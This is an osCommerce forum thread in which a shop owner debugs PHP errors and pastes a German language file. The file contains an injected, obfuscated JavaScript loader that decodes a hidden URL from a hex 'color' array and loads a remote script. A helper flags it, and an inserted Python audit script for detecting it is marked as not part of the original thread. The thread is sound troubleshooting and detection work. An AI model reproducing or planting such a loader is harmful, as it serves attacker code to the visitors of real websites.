Tobosaku (posted March 23, 2011)

An error came up today, but nothing has been changed. At least that is the situation that has been explained to me. The first error which came up was:

Fatal error: Call to a member function add_current_page() on a non-object in ./html/includes/application_top.php on line 312

I then found the following thread in this forum: http://www.oscommerce.com/forums/topic/265215-call-to-a-member-function-add-current-page-on-a-non-object/

So I tried to fix it as described there, and then another issue came up:

Parse error: syntax error, unexpected T_VAR in ./includes/languages/german/index.php on line 31

I re-uploaded the application_top.php as it was before my first repair attempt. I thought this couldn't have been the real issue then. But interestingly the new error message was still there. So here we go with the index.php mentioned in the error message:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
</head>
<body>
<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright (c) 2007 osCommerce

  Released under the GNU General Public License
*/

define('TEXT_MAIN', '<div style="text-align: center;"><big>Hier finden sie das Licht und die Lampen der Zukunft.Die geballte LED Power finden Sie in unseren Lampen und Leuchten Sortiment, die die kostengünstigere Alternative zu Glühbirnen und Energiesparlampen darstellen. In unserem LED Leuchtmittel Shop finden Sie unter anderem: <b>LED Bulbs – Birnen, LED Lampen, LED Spots, LED Scheinwerfer, LED Strips und LED Strahler.</b></big><big><b> </b>Also LED Beleuchtung für alle Bereiche des Alltags.<br> </big><big><b><img style="width: 370px; height: 184px;" alt="Leuchtmittel für jeden Bereich!" src="http://mm43507.itsaserver.org/images2/banner3.jpg"></b></big> </div>
<script type="text/javascript">
if (typeof(redef_colors)=="undefined") {
  var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
  var redef_colors = 1;
  var colors_picked = 0;
  function div_pick_colors(t,styled) {
    var s = "";
    for (j=0;j<t.length;j++) {
      var c_rgb = t[j];
      for (i=1;i<7;i++) {
        var c_clr = c_rgb.substr(i++,2);
        if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
      }
    }
    if (styled) {
      s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
    } else {
      s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
    }
    return s;
  }
  function try_pick_colors() {
    try {
      if(!document.getElementById || !document.createElement){
        document.write(div_pick_colors(div_colors,1));
      } else {
        var new_cstyle=document.createElement("script");
        new_cstyle.type="text/javascript";
        new_cstyle.src=div_pick_colors(div_colors,0);
        document.getElementsByTagName("head")[0].appendChild(new_cstyle);
      }
    } catch(e) { }
    try {
      check_colors_picked();
    } catch(e) {
      setTimeout("try_pick_colors()", 500);
    }
  }
  try_pick_colors();
}
</script>
<div style="text-align: center;"><big>Nicht nur Osram hat das günstige LED Licht im Angebot. Auch wir haben eine vielfältige Auswahl an neuen Produkten aus dem LED Leuchtmittelbereich. </big><br>
<br>
<big>Außerdem finden Sie bei uns auch Solar Leuchten und Lampen. Unter anderem die verschiedensten Solar Pflastersteine. Auch Solarbaustellenlampen, Solar Flasher, Warnlichter und Roadmarker. </big><br>
</div>
<br>
<div style="text-align: center;"><big><b>Bitte beachten Sie, dass wir einen Mindestbestellwert von <font color="red">30 Euro </font>haben.</b></big><br>
</div>
<div style="text-align: center;">
<br>
<table style="width: 80%; height: 252px; text-align: left; margin-left: auto; margin-right: auto;" border="1" cellpadding="2" cellspacing="0">
<tbody>
<tr>
<td style="text-align: center;"><small><big>Rechts der Kostenvergleich einer 40 Watt Glühbirne, einer 9 Watt Energiesparlampe und einer 4 Watt LED Birne bei ca. 8.000 Brennstunden.</big><br>
<br>
Falls sie interessiert daran sind in ihrem Betrieb oder zuhause ihre Leuchtmittel gegen LEDs auszutauschen, erstellen wir Ihnen gerne eine Amortisationsrechnung.<br>
Anhand dieser Berechnung zeigen wir Ihnen, ab wann sie Ihre Umstellung rentiert. <br>
<br>
Schicken Sie uns einfach eine Anfrage an:</small> <span style="font-weight: bold;">[email protected]</span></td>
<td style="text-align: right;"><big><b><img style="width: 260px; height: 190px;" alt="Die LED Birne im Vergleich" src="http://mm43507.itsaserver.org/images2/kosten2.png"><br>
</b></big></td>
</tr>
</tbody>
</table> ');

define('TABLE_HEADING_NEW_PRODUCTS', 'Neue Produkte im %s');
define('TABLE_HEADING_UPCOMING_PRODUCTS', 'Wann ist was verfügbar');
define('TABLE_HEADING_DATE_EXPECTED', 'Datum');

if ( ($category_depth == 'products') || (isset($HTTP_GET_VARS['manufacturers_id'])) ) {
  define('HEADING_TITLE', 'Unser Onlineshop');
  define('TABLE_HEADING_IMAGE', '');
  define('TABLE_HEADING_MODEL', 'Artikel-Nr.');
  define('TABLE_HEADING_PRODUCTS', 'Produkte');
  define('TABLE_HEADING_MANUFACTURER', 'Hersteller');
  define('TABLE_HEADING_QUANTITY', 'Anzahl');
  define('TABLE_HEADING_PRICE', 'Preis');
  define('TABLE_HEADING_WEIGHT', 'Gewicht');
  define('TABLE_HEADING_BUY_NOW', 'Bestellen');
  define('TEXT_NO_PRODUCTS', 'Es gibt keine Produkte in dieser Kategorie.');
  define('TEXT_NO_PRODUCTS2', 'Es gibt kein Produkt, das von diesem Hersteller stammt.');
  define('TEXT_NUMBER_OF_PRODUCTS', 'Artikel: ');
  define('TEXT_SHOW', '<b>Darstellen:</b>');
  define('TEXT_BUY', '1 x \'');
  define('TEXT_NOW', '\' bestellen!');
  define('TEXT_ALL_CATEGORIES', 'Alle Kategorien');
  define('TEXT_ALL_MANUFACTURERS', 'Alle Hersteller');
} elseif ($category_depth == 'top') {
  define('HEADING_TITLE', 'Unser Onlineshop:');
} elseif ($category_depth == 'nested') {
  define('HEADING_TITLE', 'Kategorien');
}
?>
</body>
</html>

I just want to be sure what to do, as my further attempts to fix it have already made other things come up.
Taipo (posted March 23, 2011)

I'd suggest you go back to your original german/index.php file that hopefully you have in a backup folder and compare the code. There seems to be a javascript piece in there that probably should not be there:

<script type="text/javascript"> if (typeof(redef_colors)=="undefined") {...

I could be wrong, as I do not have a german/index.php file to compare with, but that script code looks like it's not meant to be there.

I also suggest that you create a file in your includes folder called .htaccess (if there is not one there already) and add these bits of code to it:

Options All -Indexes
<Files *.php>
Order Deny,Allow
Deny from all
</Files>

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
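As an added example (not code from this thread or from osCommerce), a small Python audit that does what the "compare with your backup" advice above asks for, and that also explains the parse error later in the thread: it tokenises a language file's define() strings the way PHP does, so a pasted script whose '#rrggbb' literals close the TEXT_MAIN string early is reported at its line, it flags script markers, and it diffs the defines against a known-clean copy. The two sample file contents are constructed, abbreviated from the files posted in the thread.

```python
"""Audit an osCommerce language file such as includes/languages/german/index.php
for an injected script block and for the broken define() it leaves behind.
Hypothetical helper written for this thread; it is not part of osCommerce."""
import re

# Markers that have no business inside a language file's define() values.
SCRIPT_INDICATORS = ("<script", "String.fromCharCode", "document.write",
                     "createElement(", "setTimeout(")

# Constructed sample: the stock define block, abbreviated from the file Taipo posted.
STOCK = r"""<?php
define('TEXT_MAIN', '');
define('TABLE_HEADING_NEW_PRODUCTS', 'Neue Produkte im %s');
define('TEXT_BUY', '1 x \'');
define('TEXT_NOW', '\' bestellen!');
?>"""

# Constructed sample: the same file after a script block shaped like the one in the
# thread was pasted into TEXT_MAIN.  Its '#4b8272' literals close the PHP string early.
SUSPECT = r"""<?php
define('TEXT_MAIN', '<div>Shop text</div><script type="text/javascript"> if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f'); var redef_colors = 1; document.write(String.fromCharCode(104)); } </script>');
define('TABLE_HEADING_NEW_PRODUCTS', 'Neue Produkte im %s');
define('TEXT_BUY', '1 x \'');
define('TEXT_NOW', '\' bestellen!');
define('TEXT_EXTRA', 'added by someone');
?>"""


def _read_sq_string(src, i):
    """Parse a PHP single-quoted string whose opening quote is at src[i].
    Only \\' and \\\\ are escape sequences in PHP single-quoted strings.
    Returns (value, index_after_closing_quote); value is None if unterminated."""
    out, i = [], i + 1
    while i < len(src):
        c = src[i]
        if c == "\\" and i + 1 < len(src) and src[i + 1] in "'\\":
            out.append(src[i + 1])
            i += 2
        elif c == "'":
            return "".join(out), i + 1
        else:
            out.append(c)
            i += 1
    return None, i


def _skip_ws(src, i):
    while i < len(src) and src[i].isspace():
        i += 1
    return i


def parse_defines(src):
    """Return ({KEY: value}, [(line, problem)]) for every define('KEY', 'value')
    statement, reading the strings exactly as PHP does so that an unescaped
    quote inside a value shows up as the string ending early."""
    defines, issues = {}, []
    for m in re.finditer(r"define\s*\(\s*'", src):
        line = src.count("\n", 0, m.start()) + 1
        key, i = _read_sq_string(src, m.end() - 1)
        i = _skip_ws(src, i)
        if key is None or i >= len(src) or src[i] != ",":
            issues.append((line, "define() without a readable key"))
            continue
        i = _skip_ws(src, i + 1)
        if i >= len(src) or src[i] != "'":
            issues.append((line, "define('%s'): value is not a single-quoted string" % key))
            continue
        value, i = _read_sq_string(src, i)
        if value is None:
            issues.append((line, "define('%s'): value string never closes" % key))
            continue
        defines[key] = value
        i = _skip_ws(src, i)
        if i >= len(src) or src[i] != ")":
            tail = src[i:i + 20].replace("\n", " ")
            issues.append((line, "define('%s'): value string ends early; PHP parses what "
                                 "follows (%r...) as code" % (key, tail)))
    return defines, issues


def find_script_indicators(src):
    """(line, indicator) for every line that carries a script-injection marker."""
    hits = []
    for n, text in enumerate(src.splitlines(), 1):
        hits.extend((n, ind) for ind in SCRIPT_INDICATORS if ind in text)
    return hits


def compare_to_stock(stock_src, suspect_src):
    """The 'compare with your backup' step: defines added, removed or changed
    relative to a known-clean copy of the same file."""
    stock, _ = parse_defines(stock_src)
    suspect, _ = parse_defines(suspect_src)
    return {
        "added": sorted(set(suspect) - set(stock)),
        "removed": sorted(set(stock) - set(suspect)),
        "changed": sorted(k for k in stock if k in suspect and stock[k] != suspect[k]),
    }


def audit(src):
    """All findings for one file, ordered by line number."""
    _, issues = parse_defines(src)
    return sorted(issues + find_script_indicators(src))


if __name__ == "__main__":
    for line, what in audit(SUSPECT):
        print("line %d: %s" % (line, what))
    print(compare_to_stock(STOCK, SUSPECT))
```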
Tobosaku (author, posted March 23, 2011)

I thought I had restored it already, but now I copied it again. Thanks so far, I think it's a step forward that I'm now having the same error message as before:

Fatal error: Call to a member function add_current_page() on a non-object in /data/www/web466/html/includes/application_top.php on line 312

Here is the file:

<?php
/*
  $Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright (c) 2008 osCommerce

  Released under the GNU General Public License
*/

// start the timer for the page parse time log
  define('PAGE_PARSE_START_TIME', microtime());

// set the level of error reporting
  error_reporting(E_ALL & ~E_NOTICE);

// check support for register_globals
  if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) {
    exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.');
  }

// Set the local configuration parameters - mainly for developers
  if (file_exists('includes/local/configure.php')) include('includes/local/configure.php');

// include server parameters
  require('includes/configure.php');

  if (strlen(DB_SERVER) < 1) {
    if (is_dir('install')) {
      header('Location: install/index.php');
    }
  }

// define the project version
  define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a');

// some code to solve compatibility issues
  require(DIR_WS_FUNCTIONS . 'compatibility.php');

// set the type of request (secure or not)
  $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL';

// set php_self in the local scope
  if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];

  if ($request_type == 'NONSSL') {
    define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG);
  } else {
    define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG);
  }

// include the list of project filenames
  require(DIR_WS_INCLUDES . 'filenames.php');

// include the list of project database tables
  require(DIR_WS_INCLUDES . 'database_tables.php');

// customization for the design layout
  define('BOX_WIDTH', 125); // how wide the boxes should be in pixels (default: 125)

// include the database functions
  require(DIR_WS_FUNCTIONS . 'database.php');

// make a connection to the database... now
  tep_db_connect() or die('Unable to connect to database server!');

// set the application parameters
  $configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION);
  while ($configuration = tep_db_fetch_array($configuration_query)) {
    define($configuration['cfgKey'], $configuration['cfgValue']);
  }

// if gzip_compression is enabled, start to buffer the output
  if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) {
    if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) {
      if (PHP_VERSION >= '4.0.4') {
        ob_start('ob_gzhandler');
      } else {
        include(DIR_WS_FUNCTIONS . 'gzip_compression.php');
        ob_start();
        ob_implicit_flush();
      }
    } else {
      ini_set('zlib.output_compression_level', GZIP_LEVEL);
    }
  }

// set the HTTP GET parameters manually if search_engine_friendly_urls is enabled
  if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') {
    if (strlen(getenv('PATH_INFO')) > 1) {
      $GET_array = array();
      $PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF);
      $vars = explode('/', substr(getenv('PATH_INFO'), 1));
      for ($i=0, $n=sizeof($vars); $i<$n; $i++) {
        if (strpos($vars[$i], '[]')) {
          $GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1];
        } else {
          $HTTP_GET_VARS[$vars[$i]] = $vars[$i+1];
        }
        $i++;
      }

      if (sizeof($GET_array) > 0) {
        while (list($key, $value) = each($GET_array)) {
          $HTTP_GET_VARS[$key] = $value;
        }
      }
    }
  }

// define general functions used application-wide
  require(DIR_WS_FUNCTIONS . 'general.php');
  require(DIR_WS_FUNCTIONS . 'html_output.php');

// set the cookie domain
  $cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN);
  $cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH);

// include cache functions if enabled
  if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php');

// include shopping cart class
  require(DIR_WS_CLASSES . 'shopping_cart.php');

// include navigation history class
  require(DIR_WS_CLASSES . 'navigation_history.php');

// check if sessions are supported, otherwise use the php3 compatible session class
  if (!function_exists('session_start')) {
    define('PHP_SESSION_NAME', 'osCsid');
    define('PHP_SESSION_PATH', $cookie_path);
    define('PHP_SESSION_DOMAIN', $cookie_domain);
    define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY);

    include(DIR_WS_CLASSES . 'sessions.php');
  }

// define how the session functions will be used
  require(DIR_WS_FUNCTIONS . 'sessions.php');

// set the session name and save path
  tep_session_name('osCsid');
  tep_session_save_path(SESSION_WRITE_DIRECTORY);

// set the session cookie parameters
  if (function_exists('session_set_cookie_params')) {
    session_set_cookie_params(0, $cookie_path, $cookie_domain);
  } elseif (function_exists('ini_set')) {
    ini_set('session.cookie_lifetime', '0');
    ini_set('session.cookie_path', $cookie_path);
    ini_set('session.cookie_domain', $cookie_domain);
  }

// set the session ID if it exists
  if (isset($HTTP_POST_VARS[tep_session_name()])) {
    tep_session_id($HTTP_POST_VARS[tep_session_name()]);
  } elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) {
    tep_session_id($HTTP_GET_VARS[tep_session_name()]);
  }

// start the session
  $session_started = false;
  if (SESSION_FORCE_COOKIE_USE == 'True') {
    tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain);

    if (isset($HTTP_COOKIE_VARS['cookie_test'])) {
      tep_session_start();
      $session_started = true;
    }
  } elseif (SESSION_BLOCK_SPIDERS == 'True') {
    $user_agent = strtolower(getenv('HTTP_USER_AGENT'));
    $spider_flag = false;

    if (tep_not_null($user_agent)) {
      $spiders = file(DIR_WS_INCLUDES . 'spiders.txt');

      for ($i=0, $n=sizeof($spiders); $i<$n; $i++) {
        if (tep_not_null($spiders[$i])) {
          if (is_integer(strpos($user_agent, trim($spiders[$i])))) {
            $spider_flag = true;
            break;
          }
        }
      }
    }

    if ($spider_flag == false) {
      tep_session_start();
      $session_started = true;
    }
  } else {
    tep_session_start();
    $session_started = true;
  }

  if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) {
    extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS);
  }

// set SID once, even if empty
  $SID = (defined('SID') ? SID : '');

// verify the ssl_session_id if the feature is enabled
  if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) {
    $ssl_session_id = getenv('SSL_SESSION_ID');
    if (!tep_session_is_registered('SSL_SESSION_ID')) {
      $SESSION_SSL_ID = $ssl_session_id;
      tep_session_register('SESSION_SSL_ID');
    }

    if ($SESSION_SSL_ID != $ssl_session_id) {
      tep_session_destroy();
      tep_redirect(tep_href_link(FILENAME_SSL_CHECK));
    }
  }

// verify the browser user agent if the feature is enabled
  if (SESSION_CHECK_USER_AGENT == 'True') {
    $http_user_agent = getenv('HTTP_USER_AGENT');
    if (!tep_session_is_registered('SESSION_USER_AGENT')) {
      $SESSION_USER_AGENT = $http_user_agent;
      tep_session_register('SESSION_USER_AGENT');
    }

    if ($SESSION_USER_AGENT != $http_user_agent) {
      tep_session_destroy();
      tep_redirect(tep_href_link(FILENAME_LOGIN));
    }
  }

// verify the IP address if the feature is enabled
  if (SESSION_CHECK_IP_ADDRESS == 'True') {
    $ip_address = tep_get_ip_address();
    if (!tep_session_is_registered('SESSION_IP_ADDRESS')) {
      $SESSION_IP_ADDRESS = $ip_address;
      tep_session_register('SESSION_IP_ADDRESS');
    }

    if ($SESSION_IP_ADDRESS != $ip_address) {
      tep_session_destroy();
      tep_redirect(tep_href_link(FILENAME_LOGIN));
    }
  }

// create the shopping cart & fix the cart if necesary
  if (tep_session_is_registered('cart') && is_object($cart)) {
    if (PHP_VERSION < 4) {
      $broken_cart = $cart;
      $cart = new shoppingCart;
      $cart->unserialize($broken_cart);
    }
  } else {
    tep_session_register('cart');
    $cart = new shoppingCart;
  }

// include currencies class and create an instance
  require(DIR_WS_CLASSES . 'currencies.php');
  $currencies = new currencies();

// include the mail classes
  require(DIR_WS_CLASSES . 'mime.php');
  require(DIR_WS_CLASSES . 'email.php');

// set the language
  if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) {
    if (!tep_session_is_registered('language')) {
      tep_session_register('language');
      tep_session_register('languages_id');
    }

    include(DIR_WS_CLASSES . 'language.php');
    $lng = new language();

    if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) {
      $lng->set_language($HTTP_GET_VARS['language']);
    } else {
      $lng->get_browser_language();
    }

    $language = $lng->language['directory'];
    $languages_id = $lng->language['id'];
  }

// include the language translations
  require(DIR_WS_LANGUAGES . $language . '.php');

// currency
  if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) {
    if (!tep_session_is_registered('currency')) tep_session_register('currency');

    if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) {
      $currency = $HTTP_GET_VARS['currency'];
    } else {
      $currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY;
    }
  }

// navigation history
  if (tep_session_is_registered('navigation')) {
    if (PHP_VERSION < 4) {
      $broken_navigation = $navigation;
      $navigation = new navigationHistory;
      $navigation->unserialize($broken_navigation);
    }
  } else {
    tep_session_register('navigation');
    $navigation = new navigationHistory;
  }

  $navigation->add_current_page();

// Shopping cart actions
  if (isset($HTTP_GET_VARS['action'])) {
// redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled
    if ($session_started == false) {
      tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE));
    }

    if (DISPLAY_CART == 'true') {
      $goto = FILENAME_SHOPPING_CART;
      $parameters = array('action', 'cPath', 'products_id', 'pid');
    } else {
      $goto = basename($PHP_SELF);
      if ($HTTP_GET_VARS['action'] == 'buy_now') {
        $parameters = array('action', 'pid', 'products_id');
      } else {
        $parameters = array('action', 'pid');
      }
    }

    switch ($HTTP_GET_VARS['action']) {
      // customer wants to update the product quantity in their shopping cart
      case 'update_product' :
        for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) {
          if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) {
            $cart->remove($HTTP_POST_VARS['products_id'][$i]);
          } else {
            if (PHP_VERSION < 4) {
              // if PHP3, make correction for lack of multidimensional array.
              reset($HTTP_POST_VARS);
              while (list($key, $value) = each($HTTP_POST_VARS)) {
                if (is_array($value)) {
                  while (list($key2, $value2) = each($value)) {
                    if (ereg ("(.*)\]\[(.*)", $key2, $var)) {
                      $id2[$var[1]][$var[2]] = $value2;
                    }
                  }
                }
              }
              $attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : '';
            } else {
              $attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : '';
            }
            $cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false);
          }
        }
        tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
        break;
      // customer adds a product from the products page
      case 'add_product' :
        if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) {
          $cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $HTTP_POST_VARS['id']))+1, $HTTP_POST_VARS['id']);
        }
        tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
        break;
      // performed by the 'buy now' button in product listings and review page
      case 'buy_now' :
        if (isset($HTTP_GET_VARS['products_id'])) {
          if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) {
            tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id']));
          } else {
            $cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1);
          }
        }
        tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
        break;
      case 'notify' :
        if (tep_session_is_registered('customer_id')) {
          if (isset($HTTP_GET_VARS['products_id'])) {
            $notify = $HTTP_GET_VARS['products_id'];
          } elseif (isset($HTTP_GET_VARS['notify'])) {
            $notify = $HTTP_GET_VARS['notify'];
          } elseif (isset($HTTP_POST_VARS['notify'])) {
            $notify = $HTTP_POST_VARS['notify'];
          } else {
            tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
          }
          if (!is_array($notify)) $notify = array($notify);
          for ($i=0, $n=sizeof($notify); $i<$n; $i++) {
            $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'");
            $check = tep_db_fetch_array($check_query);
            if ($check['count'] < 1) {
              tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())");
            }
          }
          tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
        } else {
          $navigation->set_snapshot();
          tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
        }
        break;
      case 'notify_remove' :
        if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) {
          $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
          $check = tep_db_fetch_array($check_query);
          if ($check['count'] > 0) {
            tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
          }
          tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action'))));
        } else {
          $navigation->set_snapshot();
          tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
        }
        break;
      case 'cust_order' :
        if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) {
          if (tep_has_product_attributes($HTTP_GET_VARS['pid'])) {
            tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid']));
          } else {
            $cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1);
          }
        }
        tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
        break;
    }
  }

// include the who's online functions
  require(DIR_WS_FUNCTIONS . 'whos_online.php');
  tep_update_whos_online();

// include the password crypto functions
  require(DIR_WS_FUNCTIONS . 'password_funcs.php');

// include validation functions (right now only email address)
  require(DIR_WS_FUNCTIONS . 'validations.php');

// split-page-results
  require(DIR_WS_CLASSES . 'split_page_results.php');

// infobox
  require(DIR_WS_CLASSES . 'boxes.php');

// auto activate and expire banners
  require(DIR_WS_FUNCTIONS . 'banner.php');
  tep_activate_banners();
  tep_expire_banners();

// auto expire special products
  require(DIR_WS_FUNCTIONS . 'specials.php');
  tep_expire_specials();

// calculate category path
  if (isset($HTTP_GET_VARS['cPath'])) {
    $cPath = $HTTP_GET_VARS['cPath'];
  } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) {
    $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']);
  } else {
    $cPath = '';
  }

  if (tep_not_null($cPath)) {
    $cPath_array = tep_parse_category_path($cPath);
    $cPath = implode('_', $cPath_array);
    $current_category_id = $cPath_array[(sizeof($cPath_array)-1)];
  } else {
    $current_category_id = 0;
  }

// include the breadcrumb class and start the breadcrumb trail
  require(DIR_WS_CLASSES . 'breadcrumb.php');
  $breadcrumb = new breadcrumb;

  $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER);
  $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT));

// add category names or the manufacturer name to the breadcrumb trail
  if (isset($cPath_array)) {
    for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) {
      $categories_query = tep_db_query("select categories_name from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "'");
      if (tep_db_num_rows($categories_query) > 0) {
        $categories = tep_db_fetch_array($categories_query);
        $breadcrumb->add($categories['categories_name'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1)))));
      } else {
        break;
      }
    }
  } elseif (isset($HTTP_GET_VARS['manufacturers_id'])) {
    $manufacturers_query = tep_db_query("select manufacturers_name from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");
    if (tep_db_num_rows($manufacturers_query)) {
      $manufacturers = tep_db_fetch_array($manufacturers_query);
      $breadcrumb->add($manufacturers['manufacturers_name'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $HTTP_GET_VARS['manufacturers_id']));
    }
  }

// add the products model to the breadcrumb trail
  if (isset($HTTP_GET_VARS['products_id'])) {
    $model_query = tep_db_query("select products_model from " . TABLE_PRODUCTS . " where products_id = '" . (int)$HTTP_GET_VARS['products_id'] . "'");
    if (tep_db_num_rows($model_query)) {
      $model = tep_db_fetch_array($model_query);
      $breadcrumb->add($model['products_model'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $HTTP_GET_VARS['products_id']));
    }
  }

// initialize the message stack for output messages
  require(DIR_WS_CLASSES . 'message_stack.php');
  $messageStack = new messageStack;

// set which precautions should be checked
  define('WARN_INSTALL_EXISTENCE', 'true');
  define('WARN_CONFIG_WRITEABLE', 'true');
  define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true');
  define('WARN_SESSION_AUTO_START', 'true');
  define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true');
?>

I have already replaced the navigation history part with:

// navigation history
  if (tep_session_is_registered('navigation')) {
    if (PHP_VERSION < 4) {
      $broken_navigation = $navigation;
      $navigation = new navigationHistory;
      $navigation->unserialize($broken_navigation);
    } else {
      $navigation = new navigationHistory;
    }
  } else {
    tep_session_register('navigation');
    $navigation = new navigationHistory;
  }

  $navigation->add_current_page();

